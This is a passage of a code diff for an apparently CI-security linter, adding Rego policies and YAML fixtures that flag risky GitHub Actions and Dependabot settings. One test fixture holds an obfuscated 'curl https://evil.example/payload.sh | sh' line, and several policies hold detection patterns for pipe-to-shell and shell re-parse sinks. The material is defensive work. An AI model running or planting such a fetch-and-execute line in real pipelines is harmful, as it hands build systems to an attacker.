+# Expected: 1 finding on publish.
+name: Too broad
+on: push
+
+permissions: write-all
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "publish"
diff --git a/policies/testdata/ISSUE-601/github/clean_named.yml b/policies/testdata/ISSUE-601/github/clean_named.yml
new file mode 100644
index 0000000..f548b6c
--- /dev/null
+++ b/policies/testdata/ISSUE-601/github/clean_named.yml
@@ -0,0 +1,10 @@
+# Explicit top-level name: stable identifier for the Actions UI,
+# PR checks, required-status-checks, audit log. Expected: 0 findings.
+name: Build and Test
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-601/github/violation_unnamed.yml b/policies/testdata/ISSUE-601/github/violation_unnamed.yml
new file mode 100644
index 0000000..e935c3f
--- /dev/null
+++ b/policies/testdata/ISSUE-601/github/violation_unnamed.yml
@@ -0,0 +1,10 @@
+# No top-level `name:` — GitHub uses the file path as the display
+# identifier. Required-status-check settings that reference the file
+# path will silently break if the file is renamed. Expected: 1.
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml b/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml
new file mode 100644
index 0000000..dfc3315
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml
@@ -0,0 +1,12 @@
+# Job-level concurrency also counts as "covered". Expected: 0.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ concurrency:
+ group: deploy-${{ github.ref }}
+ cancel-in-progress: false
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml b/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml
new file mode 100644
index 0000000..3706e68
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml
@@ -0,0 +1,14 @@
+# Workflow-level concurrency: concurrent pushes on the same ref get
+# the newer run cancelled/superseded. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml b/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml
new file mode 100644
index 0000000..91e036e
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml
@@ -0,0 +1,10 @@
+# No concurrency block at either level — successive pushes on the
+# same branch race on caches and external state. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-603/github/clean_scoped_path.yml b/policies/testdata/ISSUE-603/github/clean_scoped_path.yml
new file mode 100644
index 0000000..ac5e190
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/clean_scoped_path.yml
@@ -0,0 +1,14 @@
+# path scoped to the build output directory only. Expected: 0.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make build
+ - uses: actions/upload-artifact@v4
+ with:
+ name: bin
+ path: dist/
diff --git a/policies/testdata/ISSUE-603/github/violation_dot.yml b/policies/testdata/ISSUE-603/github/violation_dot.yml
new file mode 100644
index 0000000..ad8cf3e
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/violation_dot.yml
@@ -0,0 +1,15 @@
+# upload-artifact with path=. bundles .git/ — if checkout persisted
+# the token (ISSUE-307) it leaks. Expected: 1 finding.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make build
+ - uses: actions/upload-artifact@v4
+ with:
+ name: workspace
+ path: .
diff --git a/policies/testdata/ISSUE-603/github/violation_workspace.yml b/policies/testdata/ISSUE-603/github/violation_workspace.yml
new file mode 100644
index 0000000..8c93949
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/violation_workspace.yml
@@ -0,0 +1,13 @@
+# Same pitfall, dressed up as ${{ github.workspace }}. Expected: 1.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/upload-artifact@v4
+ with:
+ name: ws
+ path: ${{ github.workspace }}
diff --git a/policies/testdata/ISSUE-604/github/clean.yml b/policies/testdata/ISSUE-604/github/clean.yml
new file mode 100644
index 0000000..e526264
--- /dev/null
+++ b/policies/testdata/ISSUE-604/github/clean.yml
@@ -0,0 +1,9 @@
+# Pure ASCII workflow. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-604/github/violation_zero_width.yml b/policies/testdata/ISSUE-604/github/violation_zero_width.yml
new file mode 100644
index 0000000..30365ff
--- /dev/null
+++ b/policies/testdata/ISSUE-604/github/violation_zero_width.yml
@@ -0,0 +1,8 @@
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: curlβhttps://evil.example/payload.sh | sh
diff --git a/policies/testdata/ISSUE-605/github/clean_oidc.yml b/policies/testdata/ISSUE-605/github/clean_oidc.yml
new file mode 100644
index 0000000..08e811f
--- /dev/null
+++ b/policies/testdata/ISSUE-605/github/clean_oidc.yml
@@ -0,0 +1,14 @@
+# No password: input — OIDC trusted publishing (permission
+# id-token: write declared at job level). Expected: 0 findings.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
diff --git a/policies/testdata/ISSUE-605/github/violation_pypi_static.yml b/policies/testdata/ISSUE-605/github/violation_pypi_static.yml
new file mode 100644
index 0000000..e338310
--- /dev/null
+++ b/policies/testdata/ISSUE-605/github/violation_pypi_static.yml
@@ -0,0 +1,15 @@
+# pypa/gh-action-pypi-publish with a static token. Long-lived secret,
+# no repo/workflow scoping — trusted publishing would close this.
+# Expected: 1 finding.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+ with:
+ password: ${{ secrets.PYPI_API_TOKEN }}
diff --git a/policies/testdata/ISSUE-606/github/clean.yml b/policies/testdata/ISSUE-606/github/clean.yml
new file mode 100644
index 0000000..1fb0b58
--- /dev/null
+++ b/policies/testdata/ISSUE-606/github/clean.yml
@@ -0,0 +1,6 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testdata/ISSUE-606/github/violation_allow.yml b/policies/testdata/ISSUE-606/github/violation_allow.yml
new file mode 100644
index 0000000..65743f8
--- /dev/null
+++ b/policies/testdata/ISSUE-606/github/violation_allow.yml
@@ -0,0 +1,11 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ insecure-external-code-execution: allow
+ - package-ecosystem: pip
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml b/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml
new file mode 100644
index 0000000..6bbc016
--- /dev/null
+++ b/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml
@@ -0,0 +1,11 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ cooldown:
+ default-days: 3
+ semver-major-days: 7
+ include:
+ - "*"
diff --git a/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml b/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml
new file mode 100644
index 0000000..883d6c4
--- /dev/null
+++ b/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml
@@ -0,0 +1,10 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ - package-ecosystem: pip
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testmain_test.go b/policies/testmain_test.go
new file mode 100644
index 0000000..60e80db
--- /dev/null
+++ b/policies/testmain_test.go
@@ -0,0 +1,18 @@
+package policies_test
+
+import (
+ "os"
+ "testing"
+)
+
+// TestMain short-circuits the collector's GitHub API enrichment
+// globally for the test suite. Unit tests drive the collector on
+// temp fixtures that reference public actions like `actions/
+// checkout@v4` — we do not want each fixture to trigger live API
+// calls. Production binaries ignore this env var.
+func TestMain(m *testing.M) {
+ if err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1"); err != nil {
+ panic(err)
+ }
+ os.Exit(m.Run())
+}
diff --git a/policies/undocumented_permissions.rego b/policies/undocumented_permissions.rego
new file mode 100644
index 0000000..2cb2a68
--- /dev/null
+++ b/policies/undocumented_permissions.rego
@@ -0,0 +1,32 @@
+# undocumented-permissions β flag jobs that run with no explicit
+# `permissions:` block at either the workflow or job level. When
+# neither layer declares permissions, the GITHUB_TOKEN falls back to
+# the repository-wide default β often `contents: write` or
+# `read-all` β and every step gets more authority than it needs.
+# Any compromise (unpinned action, template-injection, cache
+# poisoning) inherits that default.
+#
+# The collector materialises the effective permissions on each job:
+# job-level first, falling back to workflow-level. When both are
+# absent, `permissions` is nil / missing from the JSON, which is
+# exactly what this policy looks for.
+#
+# GitHub Actions only β the `permissions:` keyword does not exist in
+# GitLab CI, so applying this rule there would flag every GitLab job
+# as a false positive.
+package undocumented_permissions
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ some i
+ job := input.pipeline.jobs[i]
+ not job.permissions
+ finding := {
+ "code": "ISSUE-304",
+ "severity": "medium",
+ "message": sprintf("job %q runs with no explicit `permissions:` block β the GITHUB_TOKEN inherits the repository default scope", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/unpinned_package_install.rego b/policies/unpinned_package_install.rego
new file mode 100644
index 0000000..7ee3139
--- /dev/null
+++ b/policies/unpinned_package_install.rego
@@ -0,0 +1,48 @@
+# unpinned-package-install β flag `run:` steps that invoke a
+# package manager against a single package name without pinning
+# a version (pip install pkg==1.2.3) and without a lockfile-based
+# install (pip install -r requirements.txt, npm ci). The window
+# between runs then resolves whatever the registry serves at
+# execution time β the exact surface typosquat and maintainer-
+# account compromise attacks exploit.
+#
+# Narrow by design: flags only `pip install pkg` / `npm install
+# pkg` when the package name is the first and only argument.
+# Commands with flags (`-r`, `--require-hashes`, `-e .`, `-c`) or
+# lockfile-based commands (`npm ci`) stay silent. The intent is to
+# catch the shape typosquats live on, not every flagged variation.
+package unpinned_package_install
+
+import rego.v1
+
+bare_pip_install_pattern := `(?m)^\s*(?:python[0-9.]*\s+-m\s+)?pip(?:3)?\s+install\s+[A-Za-z_][A-Za-z0-9._-]*\s*$`
+
+# Inline pin `pip install pkg==1.2.3` keeps the command silent.
+pip_pinned_pattern := `\bpip(?:3)?\s+install\s+[A-Za-z_][A-Za-z0-9._-]*==`
+
+bare_npm_install_pattern := `(?m)^\s*npm\s+install\s+(?:@[a-zA-Z0-9-]+/)?[a-zA-Z][a-zA-Z0-9._-]*\s*$`
+
+npm_pinned_pattern := `\bnpm\s+install\s+(?:@[a-zA-Z0-9-]+/)?[a-zA-Z0-9._-]+@[0-9^~>=<]`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ _unpinned_package_install(script)
+ finding := {
+ "code": "ISSUE-214",
+ "severity": "medium",
+ "message": sprintf("job %q installs a package without a pinned version or lockfile β add `==X.Y.Z` / `@X.Y.Z` or switch to `pip install -r requirements.txt` / `npm ci`", [job.name]),
+ "job": job.name,
+ }
+}
+
+_unpinned_package_install(script) if {
+ regex.match(bare_pip_install_pattern, script)
+ not regex.match(pip_pinned_pattern, script)
+}
+
+_unpinned_package_install(script) if {
+ regex.match(bare_npm_install_pattern, script)
+ not regex.match(npm_pinned_pattern, script)
+}
diff --git a/policies/unredacted_secrets.rego b/policies/unredacted_secrets.rego
new file mode 100644
index 0000000..40cb906
--- /dev/null
+++ b/policies/unredacted_secrets.rego
@@ -0,0 +1,51 @@
+# unredacted-secrets β flag workflows that deserialise a secret via
+# fromJSON and reference one of its sub-fields. GitHub's runtime log
+# redaction works on known secret strings (those declared in the
+# secrets store). Once `fromJSON(secrets.X).y` evaluates, the inner
+# field is a brand-new string the runtime has never seen, so every
+# subsequent print / log / HTTP header leaks it verbatim.
+#
+# The check looks for the pattern `fromJSON(secrets.β¦).` across
+# scripts, env bindings and `with:` inputs. The bare
+# `fromJSON(secrets.X)` form that stays inside an opaque object β no
+# `.y` dereference on the same line β is not flagged; only the
+# projection leaks.
+package unredacted_secrets
+
+import rego.v1
+
+# Whitespace tolerated around fromJSON / secrets; trailing `.ident`
+# required so the bare `fromJSON(secrets.X)` with no projection stays
+# silent. Case-insensitive for the fromJSON keyword since GitHub
+# accepts both `fromJson` and `fromJSON`.
+unredacted_pattern := `(?i)fromJSON\s*\(\s*secrets\.[A-Za-z_][A-Za-z0-9_]*\s*\)\s*\.[A-Za-z_]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_unredacts_secrets(job)
+ finding := {
+ "code": "ISSUE-303",
+ "severity": "high",
+ "message": sprintf("job %q dereferences a secret via fromJSON β GitHub cannot redact the resulting sub-fields from job logs", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_unredacts_secrets(job) if {
+ some k
+ regex.match(unredacted_pattern, job.scripts[k])
+}
+
+_job_unredacts_secrets(job) if {
+ some _, value in job.variables
+ regex.match(unredacted_pattern, value)
+}
+
+_job_unredacts_secrets(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(unredacted_pattern, value)
+}
diff --git a/policies/unsafe_github_context_dump.rego b/policies/unsafe_github_context_dump.rego
new file mode 100644
index 0000000..301c550
--- /dev/null
+++ b/policies/unsafe_github_context_dump.rego
@@ -0,0 +1,50 @@
+# unsafe-github-context-dump β flag workflows that serialise the
+# whole `github` context (or `github.event`) with `toJson(...)` and
+# hand it to a script, env binding, or action input. The resulting
+# JSON carries every user-controllable field GitHub exposes; any
+# downstream consumer (log, third-party action, HTTP header) then
+# sees a payload that is trivially shell-injectable under privileged
+# triggers (`pull_request_target`, `workflow_run`).
+#
+# Mirror of ISSUE-301 (overprovisioned-secrets) applied to the
+# github context. Severity is high rather than critical: the
+# github context does not carry long-lived tokens like `secrets`
+# does, but it can still be weaponised into shell injection.
+package unsafe_github_context_dump
+
+import rego.v1
+
+# Matches toJson(github), toJson(github.event), and whitespace-
+# permissive variants. Case-insensitive because GitHub accepts both
+# `toJson` and `toJSON`.
+context_dump_pattern := `(?i)to\s*json\s*\(\s*github(\.event)?\s*\)`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_dumps_github(job)
+ finding := {
+ "code": "ISSUE-213",
+ "severity": "high",
+ "message": sprintf("job %q serialises the entire `github` context via toJson(github) β pass specific fields by name instead", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_dumps_github(job) if {
+ some k
+ regex.match(context_dump_pattern, job.scripts[k])
+}
+
+_job_dumps_github(job) if {
+ some _, value in job.variables
+ regex.match(context_dump_pattern, value)
+}
+
+_job_dumps_github(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(context_dump_pattern, value)
+}
diff --git a/policies/unsafe_variable_expansion.rego b/policies/unsafe_variable_expansion.rego
new file mode 100644
index 0000000..00088e0
--- /dev/null
+++ b/policies/unsafe_variable_expansion.rego
@@ -0,0 +1,92 @@
+# unsafe-variable-expansion β flag pipeline scripts that pipe or
+# re-parse an attacker-controlled CI variable through a shell. The
+# classic sinks are `eval`, `sh -c`, `bash -c`, `dash/zsh/ksh -c`,
+# `envsubst|xargs` chains, and shell sourcing (`source` /
+# `. file`). When the variable carried into those sinks is one of the
+# user-influenceable CI variables (CI_COMMIT_MESSAGE,
+# CI_COMMIT_BRANCH, etc.), an attacker pushing a crafted commit or
+# branch name can execute arbitrary shell code.
+#
+# Parity with the legacy Go control:
+# - The pattern list mirrors controlGitlabPipelineVariableInjection.go
+# verbatim (eval, *sh -c, envsubst|sh, xargs sh|bash, source, dot
+# sourcing).
+# - Empty/comment lines are skipped before re-parse detection.
+# - Variable detection enforces a word boundary on the unbraced
+# `$VAR` form, mirroring the legacy regex
+# `\$(?:\{VAR\}|VAR(?:[^a-zA-Z0-9_]|$))`. So `$CI_COMMIT_MESSAGE`
+# matches but `$CI_COMMIT_MESSAGE_OTHER` does not.
+#
+# Config:
+# input.config.unsafeVariableExpansion.dangerousVariables = ["CI_COMMIT_MESSAGE", β¦]
+# input.config.unsafeVariableExpansion.allowedPatterns = ["safe pattern", β¦]
+package unsafe_variable_expansion
+
+import rego.v1
+
+shell_reparse_patterns := [
+ `\beval\b`,
+ `\b(sh|bash|dash|zsh|ksh)\s+-c\b`,
+ `\benvsubst\b.*\|\s*(sh|bash|dash|zsh)`,
+ `\bxargs\s+(sh|bash)\b`,
+ `\bsource\b`,
+ `^\s*\.(\s|$)`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ line := job.scripts[j]
+ trimmed := trim_space(line)
+ trimmed != ""
+ not startswith(trimmed, "#")
+ _has_shell_reparse(trimmed)
+ var_name := _dangerous_variable_in_line(line)
+ not _is_allowed(line)
+ block := _script_block(job, j)
+ finding := {
+ "code": "ISSUE-204",
+ "severity": "high",
+ "message": sprintf("$%s in job '%s' %s: %s", [var_name, job.name, block, trimmed]),
+ "job": job.name,
+ "variableName": var_name,
+ "scriptLine": trimmed,
+ "scriptBlock": block,
+ }
+}
+
+# _script_block returns the block label ("before_script", "script",
+# "after_script") for the script line at index `j`. Falls back to
+# "script" when the collector did not populate ScriptBlocks (older
+# fixtures, non-GitLab providers).
+_script_block(job, j) := block if {
+ block := job.scriptBlocks[j]
+ block != ""
+} else := "script"
+
+_has_shell_reparse(line) if {
+ regex.match(shell_reparse_patterns[_], line)
+}
+
+_dangerous_variable_in_line(line) := name if {
+	hits := {v | some v in input.config.unsafeVariableExpansion.dangerousVariables; _variable_used(line, v)}
+	count(hits) > 0
+	name := min(hits)
+}
+
+# Match ${VAR} (braced β exact name).
+_variable_used(line, name) if {
+ regex.match(sprintf(`\$\{%s\}`, [name]), line)
+}
+
+# Match $VAR followed by a non-word boundary or end-of-line. Mirrors
+# the legacy `\$VAR(?:[^a-zA-Z0-9_]|$)` form so `$CI_COMMIT_MESSAGE`
+# is flagged but `$CI_COMMIT_MESSAGE_OTHER` is not.
+_variable_used(line, name) if {
+ regex.match(sprintf(`\$%s($|[^a-zA-Z0-9_])`, [name]), line)
+}
+
+_is_allowed(line) if {
+ pattern := input.config.unsafeVariableExpansion.allowedPatterns[_]
+ regex.match(pattern, line)
+}
diff --git a/policies/unsound_condition.rego b/policies/unsound_condition.rego
new file mode 100644
index 0000000..5d19335
--- /dev/null
+++ b/policies/unsound_condition.rego
@@ -0,0 +1,52 @@
+# unsound-condition β flag `if:` expressions that are logically
+# unsound: tautologies (`always()` short-circuiting an OR),
+# contradictions (`false && ...`), and bare boolean conditions that
+# never evaluate to the expected value because GitHub parses them as
+# string literals when the author forgot the `${{ }}` wrapping.
+#
+# These are subtle bugs: the gate the author believes they have
+# installed is not actually there, and the step / job runs (or never
+# runs) silently. The policy is per-condition, reusing the IR's
+# Conditions slice (job + step-level `if:` collected by the
+# collector).
+package unsound_condition
+
+import rego.v1
+
+tautology_patterns := [
+	`\balways\(\)\s*\|\|`,
+	`\|\|\s*always\(\)`,
+	`\btrue\s*==\s*true\b`,
+	`\b1\s*==\s*1\b`,
+	`'[^']*'\s*==\s*'[^']*'\s*\|\|\s*true\b`,
+]
+
+contradiction_patterns := [
+ `\bfalse\s*&&`,
+ `&&\s*false\b`,
+ `\btrue\s*==\s*false\b`,
+ `\bfalse\s*==\s*true\b`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ cond := job.conditions[j]
+ reason := _unsound_reason(cond)
+ finding := {
+ "code": "ISSUE-211",
+ "severity": "medium",
+ "message": sprintf("job %q has an unsound `if:` condition (%s): %q", [job.name, reason, cond]),
+ "job": job.name,
+ }
+}
+
+# Chained with `else` so a condition matching both pattern sets
+# resolves to "tautology" instead of a complete-rule conflict error.
+_unsound_reason(cond) := "tautology" if {
+	some p in tautology_patterns
+	regex.match(p, cond)
+} else := "contradiction" if {
+	some p in contradiction_patterns
+	regex.match(p, cond)
+}
diff --git a/policies/unsound_contains.rego b/policies/unsound_contains.rego
new file mode 100644
index 0000000..328b6d3
--- /dev/null
+++ b/policies/unsound_contains.rego
@@ -0,0 +1,51 @@
+# unsound-contains β flag `contains(haystack, needle)` calls whose
+# argument order makes the check always fail. The most frequent
+# footgun is `contains('main', github.ref)`: the literal `'main'`
+# does not contain `refs/heads/main`, so the gate never matches on
+# the `main` branch β but the author intended the opposite.
+#
+# Detection heuristic: `contains('β¦literalβ¦', β¦expressionβ¦)` β a
+# string literal as the HAYSTACK with an expression as the NEEDLE is
+# almost always the inverted form. The safe form is
+# `contains(github.ref, 'refs/heads/main')` or
+# `contains(fromJSON('[β¦]'), github.ref_name)` (explicit set).
+package unsound_contains
+
+import rego.v1
+
+# First argument is a string literal (single quotes, no template
+# expressions inside), second argument references a template
+# expression (`github.`, `inputs.`, `needs.`, `env.`, `vars.`,
+# `steps.`, `secrets.`, `matrix.`, `runner.`). The fromJSON(...)
+# haystack form β a valid JSON list as the first argument β is the
+# safe idiom, so we exclude `fromJSON(` from the literal match.
+suspicious_pattern := `\bcontains\s*\(\s*'[^']{1,40}'\s*,\s*(github\.|inputs\.|needs\.|env\.|vars\.|steps\.|secrets\.|matrix\.|runner\.)`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ cond := job.conditions[j]
+ regex.match(suspicious_pattern, cond)
+ finding := {
+ "code": "ISSUE-212",
+ "severity": "medium",
+ "message": sprintf("job %q calls `contains()` with a literal haystack and an expression needle β arguments likely inverted in %q", [job.name, cond]),
+ "job": job.name,
+ }
+}
+
+# Scripts can also build `contains(...)` calls inside ${{ }} blocks
+# that feed env bindings or output assignments. Same check applied
+# to the scripts slice.
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ regex.match(suspicious_pattern, script)
+ finding := {
+ "code": "ISSUE-212",
+ "severity": "medium",
+ "message": sprintf("job %q has a script with an inverted `contains(literal, expression)` call", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/unverified_scripts.rego b/policies/unverified_scripts.rego
new file mode 100644
index 0000000..3258940
--- /dev/null
+++ b/policies/unverified_scripts.rego
@@ -0,0 +1,47 @@
+# unverified-scripts β flag pipeline scripts that download and execute
+# remote code without integrity verification. The classic offender is
+# the `curl ... | bash` pattern, a well-known supply-chain attack
+# vector: a single compromise of the upstream URL turns the pipeline
+# into an attacker-controlled payload.
+#
+# The policy currently matches the "pipe-to-shell" shape. Other unsafe
+# patterns (download-and-exec, download-redirect-exec) can be added
+# incrementally.
+#
+# Lines that include a checksum / signature verification command on
+# the same line (sha256sum, shasum, gpg --verify, cosign verify, β¦)
+# are treated as intentionally verified and skipped.
+package unverified_scripts
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ line := job.scripts[j]
+ regex.match(`(?i)(curl|wget)\s+[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python[23]?|perl|ruby)\b`, line)
+ not _line_is_verified(line)
+ not _line_is_trusted(line)
+ finding := {
+ "code": "ISSUE-411",
+ "severity": "high",
+ "message": sprintf("Job '%s' script: %s", [job.name, trim_space(line)]),
+ "job": job.name,
+ "scriptLine": line,
+ }
+}
+
+_line_is_verified(line) if {
+ regex.match(`(?i)(sha256sum|sha512sum|sha1sum|shasum|gpg\s+--verify|cosign\s+verify)`, line)
+}
+
+# A line is trusted when it references at least one URL whose host
+# (and optional path prefix) matches a user-configured glob in
+# pipelineMustNotExecuteUnverifiedScripts.trustedUrls. Mirrors the
+# legacy isTrusted helper: extract every http(s) URL on the line and
+# allow the line as soon as any of them matches a trusted pattern.
+_line_is_trusted(line) if {
+ some pattern in input.config.unverifiedScripts.trustedUrls
+ url := regex.find_n(`https?://[^\s|;)'"]+`, line, -1)[_]
+ glob.match(pattern, null, url)
+}
diff --git a/policies/use_trusted_publishing.rego b/policies/use_trusted_publishing.rego
new file mode 100644
index 0000000..2520711
--- /dev/null
+++ b/policies/use_trusted_publishing.rego
@@ -0,0 +1,66 @@
+# use-trusted-publishing β flag PyPI / npm / Maven-Central publish
+# steps that rely on a long-lived static token instead of OIDC
+# trusted publishing. The explicit signal is a `password:` /
+# `NODE_AUTH_TOKEN` / equivalent `with:` / `env:` input that points
+# at a secrets.* value, paired with a known publish action.
+#
+# OIDC trusted publishing removes the standing secret: tokens are
+# short-lived, scoped to a repository / workflow / environment, and
+# minted only for the run that claims them. Projects migrating away
+# from static tokens drop the `password:` input entirely.
+package use_trusted_publishing
+
+import rego.v1
+
+# Publish actions we know about. The policy does not cover every
+# obscure community action β Dependabot's own publish pipeline, for
+# instance β but the big three ecosystems are here.
+publish_actions := {
+ "pypa/gh-action-pypi-publish": "PyPI",
+ "JS-DevTools/npm-publish": "npm",
+ "gradle/gradle-build-action": "Gradle",
+ "gradle/actions/publish": "Gradle",
+ "sonatype/central-publishing-gradle-plugin": "Maven Central",
+}
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ ecosystem := _publish_action_ecosystem(action.uses)
+ _step_uses_static_token(action)
+ finding := {
+ "code": "ISSUE-605",
+ "severity": "high",
+ "message": sprintf("job %q publishes to %s via %q with a static token β migrate to OIDC trusted publishing", [job.name, ecosystem, action.uses]),
+ "job": job.name,
+ "line": object.get(action, "line", 0),
+ }
+}
+
+_publish_action_ecosystem(uses) := eco if {
+ some prefix, ecosystem in publish_actions
+ startswith(uses, sprintf("%s@", [prefix]))
+ eco := ecosystem
+}
+
+_publish_action_ecosystem(uses) := eco if {
+ some prefix, ecosystem in publish_actions
+ uses == prefix
+ eco := ecosystem
+}
+
+_step_uses_static_token(action) if {
+ # pypa/gh-action-pypi-publish keys its token on `password`.
+ # When OIDC is used, the input is simply omitted.
+ pw := action.with.password
+ is_string(pw)
+ regex.match(`\$\{\{\s*secrets\.`, pw)
+}
+
+_step_uses_static_token(action) if {
+ # JS-DevTools/npm-publish: `token` input holds the static token.
+ tok := action.with.token
+ is_string(tok)
+ regex.match(`\$\{\{\s*secrets\.`, tok)
+}
diff --git a/policies/workflow_misfeature.rego b/policies/workflow_misfeature.rego
new file mode 100644
index 0000000..56fca98
--- /dev/null
+++ b/policies/workflow_misfeature.rego
@@ -0,0 +1,44 @@
+# workflow-misfeature β flag two supported-but-harmful patterns:
+#
+# 1. `actions/upload-artifact` with `path: .` (or the checkout
+# directory) uploads the entire repository, including `.git/`.
+# Paired with artipacked (ISSUE-307) this exfiltrates the
+# GITHUB_TOKEN to anyone who can download the artefact.
+# 2. `actions/upload-artifact` with `path: ${{ github.workspace }}`
+# β same thing, just dressed up as an expression.
+#
+# Other misfeature patterns from the catalog β `shell: cmd`, inline
+# pip install with a remote URL β are either covered by ISSUE-411
+# (unverified scripts) or require step-level shell tracking the IR
+# does not carry yet.
+package workflow_misfeature
+
+import rego.v1
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ action := job.uses[j]
+ startswith(action.uses, "actions/upload-artifact@")
+ path := action.with.path
+ is_string(path)
+ _uploads_checkout_dir(path)
+ finding := {
+ "code": "ISSUE-603",
+ "severity": "medium",
+ "message": sprintf("job %q uploads the checkout directory as an artefact (path=%q) β `.git/` leaks with it, pair with ISSUE-307 to understand the risk", [job.name, path]),
+ "job": job.name,
+ }
+}
+
+_uploads_checkout_dir(path) if {
+ path == "."
+}
+
+_uploads_checkout_dir(path) if {
+ path == "./"
+}
+
+_uploads_checkout_dir(path) if {
+ regex.match(`\$\{\{\s*github\.workspace\s*\}\}\s*/?$`, path)
+}
diff --git a/policies/workflow_obfuscation.rego b/policies/workflow_obfuscation.rego
new file mode 100644
index 0000000..c69fe1f
--- /dev/null
+++ b/policies/workflow_obfuscation.rego
@@ -0,0 +1,49 @@
+# workflow-obfuscation β flag workflows whose scripts or expression
+# fragments carry invisible or bidirectional Unicode characters. The
+# rendered source reads harmless in a diff review, while the runner
+# executes a different instruction. Two classes are covered:
+#
+# - Zero-width spaces / joiners / non-joiners (U+200BβU+200F,
+# U+FEFF) β used to hide tokens inside an identifier or a URL.
+# - Bidirectional overrides (U+202AβU+202E, U+2066βU+2069) β the
+# Trojan Source attack class (CVE-2021-42574) exploited in the
+# wild since 2021 against npm / PyPI packages.
+#
+# The scan runs on every script line, every env binding value, and
+# every action `with:` input. Normal ASCII, latin-1, and whitespace
+# pass through untouched.
+package workflow_obfuscation
+
+import rego.v1
+
+invisible_pattern := `[\x{200B}-\x{200F}\x{202A}-\x{202E}\x{2066}-\x{2069}\x{FEFF}]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_contains_obfuscation(job)
+ finding := {
+ "code": "ISSUE-604",
+ "severity": "high",
